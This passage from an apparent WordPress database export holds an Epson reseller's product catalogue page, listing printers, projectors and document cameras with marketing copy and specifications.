warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /><br>\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Speed: Up to 30ppm</li>\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\n 	<li>Quality prints with new Epson Technologies</li>\n 	<li>New print job management features</li>\n</ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /><br>\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 35ppm</li>\n 	<li>Auto-Duplex</li>\n 	<li>Ethernet &amp; Epson iPrint</li>\n 	<li>2 optional paper cassette tray</li>\n</ul>[maxbutton id=\"12\" ]<h4><strong>Epson WorkForce AL-M8100DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /><br><br>\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 40 ppm</li>\n 	<li>Epson iPrint</li>\n 	<li>Ethernet</li>\n 	<li>4 optional cassette trays</li>\n</ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 17:34:34','2019-09-25 09:34:34','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3476,1,'2019-09-25 17:34:58','2019-09-25 09:34:58','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /><br>\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Speed: Up to 30ppm</li>\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\n 	<li>Quality prints with new Epson Technologies</li>\n 	<li>New print job management features</li>\n</ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /><br>\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 35ppm</li>\n 	<li>Auto-Duplex</li>\n 	<li>Ethernet &amp; Epson iPrint</li>\n 	<li>2 optional paper cassette tray</li>\n</ul>[maxbutton id=\"12\" ]<h4><strong>Epson WorkForce AL-M8100DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /><br><br>\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 40 ppm</li>\n 	<li>Epson iPrint</li>\n 	<li>Ethernet</li>\n 	<li>4 optional cassette trays</li>\n</ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" 